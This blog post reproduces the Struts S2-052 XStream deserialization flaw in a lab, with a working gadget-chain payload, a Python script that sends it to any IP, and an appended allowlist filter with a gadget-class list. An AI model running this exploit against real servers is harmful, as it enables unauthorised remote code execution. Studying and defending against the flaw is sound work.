S2-052 POC Test
Source: Internet | Published by: 大禹网络 | Editor: 程序博客网 | Time: 2024/05/16 18:13
Today my WeChat Moments feed was flooded with S2-052. I read quite a few experts' analyses and, although I don't fully understand the principle, I wanted to try reproducing it.
1. Environment setup:
Needed: Tomcat, a JDK, the struts-2.5.12 package and Burp Suite.
I'll skip installing Tomcat and the JDK. One caveat worth knowing: the payload below is built from JDK-internal classes (jdk.nashorn.internal.*, com.sun.xml.internal.*) that ship with Java 8, so a JDK 8 is the safe choice for the lab.
struts-2.5.12 package download: http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
After downloading, unzip it and copy struts2-rest-showcase.war from the apps directory into Tomcat's webapps directory; Tomcat deploys it when it starts.
2. POC test
Start Tomcat and visit http://your-IP/struts2-rest-showcase in a browser (on Tomcat's default port 8080, which is also the port the Python POC below assumes).
Once the page loads, point the browser at a proxy, start Burp Suite, and set its listener to the same port as the browser's proxy setting.
Click any View link and intercept the request.
In the intercepted request, set the header Content-Type: application/xml (this is what makes the REST plugin's ContentTypeInterceptor hand the request body to its XStream handler) and put the POC in the request body.
As for the POC, I found it online too; I honestly couldn't write one myself.
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>
Then forward the request. The calculator pops up.
What makes this work is that the REST plugin's XStream handler of struts 2.5.12 instantiates whatever classes the XML names, with no type restriction. While the outer map is being built, XStream computes the hash of the NativeString key; that reads the Base64Data value through the CipherInputStream, and the Cipher's serviceIterator (a FilterIterator whose filter is an ImageIO$ContainsFilter wrapping ProcessBuilder.start) reflectively starts the ProcessBuilder whose command is calc. The command runs before the unmarshalling finishes, so the server typically answers with a 500 even though the payload has already done its job. The showcase here is running on Windows, hence the calculator; on another OS replace calc with a command that exists on the target.
Python POC example (Python 3):
import sys
import urllib.error
import urllib.request

# Same payload as above, kept on one line so it can be sent as-is.
xml_request = '''<map><entry><jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'''

# Usage: python poc.py <target-ip>; the showcase is assumed on port 8080.
test_url = "http://" + sys.argv[1] + ":8080/struts2-rest-showcase/orders/3"
print("test url is %s" % test_url)
try:
    # Content-Type: application/xml routes the body to the REST plugin's XStream handler.
    request = urllib.request.Request(
        url=test_url,
        headers={'Content-Type': 'application/xml', 'charset': 'UTF-8'},
        data=xml_request.encode('utf-8'))
    with urllib.request.urlopen(request) as f:
        print(f.read().decode('utf-8', 'replace'))
except urllib.error.HTTPError as e:
    # A 500 from the unmarshaller is only a hint, not proof: the real signal is
    # the command running on the server (the calculator in the test above).
    print("The test url is struts-52!!!")
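Added example, not from the original post or the Struts project: the fix shipped in Struts 2.5.13 switched the XStream handler to an allowlist (deny all types by default, then allow primitives, collections and the action's own model classes). The check below applies the same principle in front of the application, extracting every element tag and every class="..." value from an XML request body and blocking anything outside the allowlist, and it runs here over constructed raw HTTP requests: the page's payload trimmed to the elements that carry class names, an ordinary order body, a JSON body, an empty body and a malformed one. The showcase Order field names (id, clientName, amount), the host 192.0.2.10 and the trimmed payload are assumptions made for the example.

```python
import xml.etree.ElementTree as ET

# Names a legitimate struts2-rest-showcase order body may carry. Assumption:
# the showcase Order model exposes id, clientName and amount; extend per app.
# Tags are treated as type names too (XStream resolves the root tag and
# collection-item tags as classes), so field names must be listed as well.
ALLOWED_TYPES = {
    "order", "id", "clientName", "amount",
    "string", "int", "long", "double", "boolean", "map", "entry", "list",
}

# Classes named in the S2-052 gadget chain used by the POC on this page.
# They only annotate a block; the allowlist is what decides it.
GADGET_TYPES = {
    "jdk.nashorn.internal.objects.NativeString",
    "com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data",
    "com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource",
    "javax.crypto.CipherInputStream",
    "javax.crypto.NullCipher",
    "javax.imageio.spi.FilterIterator",
    "javax.imageio.ImageIO$ContainsFilter",
    "java.lang.ProcessBuilder",
}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).
    Header names are lower-cased; the body is returned as bytes."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def xml_type_names(body):
    """Return every element tag and every class="..." value in the body.
    ET.fromstring does not fetch external entities, but it is not a hardened
    parser; in production put defusedxml or a size cap in front of it."""
    names = set()
    for el in ET.fromstring(body).iter():
        names.add(el.tag)
        cls = el.get("class")
        if cls:
            names.add(cls)
    return names


def check_request(raw):
    """Decide whether the REST plugin's XML handler should see this body.
    The plugin unmarshals any non-empty body whose Content-Type maps to the
    XML handler whatever the HTTP method (the POC on this page rides on the
    GET issued by the showcase's View link), so the method is ignored here."""
    _method, _path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if ctype not in ("application/xml", "text/xml") or not body.strip():
        return {"verdict": "allow", "reason": "no XML body to unmarshal",
                "gadgets": [], "unknown_types": []}
    try:
        names = xml_type_names(body)
    except ET.ParseError as exc:
        return {"verdict": "block", "reason": "unparseable XML: %s" % exc,
                "gadgets": [], "unknown_types": []}
    unknown = sorted(n for n in names if n not in ALLOWED_TYPES)
    gadgets = sorted(n for n in names if n in GADGET_TYPES)
    if unknown:
        reason = "types outside the allowlist" + (
            " (known S2-052 gadget classes present)" if gadgets else "")
        return {"verdict": "block", "reason": reason,
                "gadgets": gadgets, "unknown_types": unknown}
    return {"verdict": "allow", "reason": "all types allowlisted",
            "gadgets": [], "unknown_types": []}


def build_request(method, path, content_type, body):
    """Assemble a raw request; host and path are lab placeholders (assumed)."""
    head = "\r\n".join([
        "%s %s HTTP/1.1" % (method, path),
        "Host: 192.0.2.10:8080",
        "Content-Type: %s" % content_type,
        "Content-Length: %d" % len(body),
    ])
    return head.encode("latin-1") + b"\r\n\r\n" + body


PATH = "/struts2-rest-showcase/orders/3"

# Constructed samples. POC_BODY is the page's payload trimmed to the elements
# that carry class names; on its own it is not a working exploit.
POC_BODY = (
    b'<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>'
    b'<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler>'
    b'<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">'
    b'<is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher">'
    b'<serviceIterator class="javax.imageio.spi.FilterIterator">'
    b'<iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/>'
    b'<next class="java.lang.ProcessBuilder"><command><string>calc</string></command></next></iter>'
    b'<filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class>'
    b'<name>start</name><parameter-types/></method><name>foo</name></filter>'
    b'<next class="string">foo</next></serviceIterator></cipher></is></dataSource></dataHandler>'
    b'</value></jdk.nashorn.internal.objects.NativeString></entry></map>'
)
SAMPLE_POC = build_request("GET", PATH, "application/xml", POC_BODY)
SAMPLE_ORDER = build_request("PUT", PATH, "application/xml",
                             b"<order><clientName>Bob</clientName><amount>33</amount></order>")
SAMPLE_JSON = build_request("PUT", PATH, "application/json", b'{"clientName": "Bob", "amount": 33}')
SAMPLE_EMPTY = build_request("GET", PATH, "application/xml", b"")
SAMPLE_BROKEN = build_request("PUT", PATH, "application/xml", b"<order><id>1</order>")

if __name__ == "__main__":
    for label, sample in (("poc", SAMPLE_POC), ("order", SAMPLE_ORDER), ("json", SAMPLE_JSON),
                          ("empty", SAMPLE_EMPTY), ("broken", SAMPLE_BROKEN)):
        print(label, check_request(sample))
```

Run it directly to print the five verdicts. The allowlist, not the gadget list, is the control: the gadget list only explains why a block happened, and a payload built from a different chain is still blocked because it names types the application never declared. The proper place for this control is inside XStream itself, which is what upgrading to 2.5.13 gives you; a front-end check like this is defence in depth for the window before the upgrade, and it must be kept in step with the model classes the application really accepts, or legitimate bodies will be rejected.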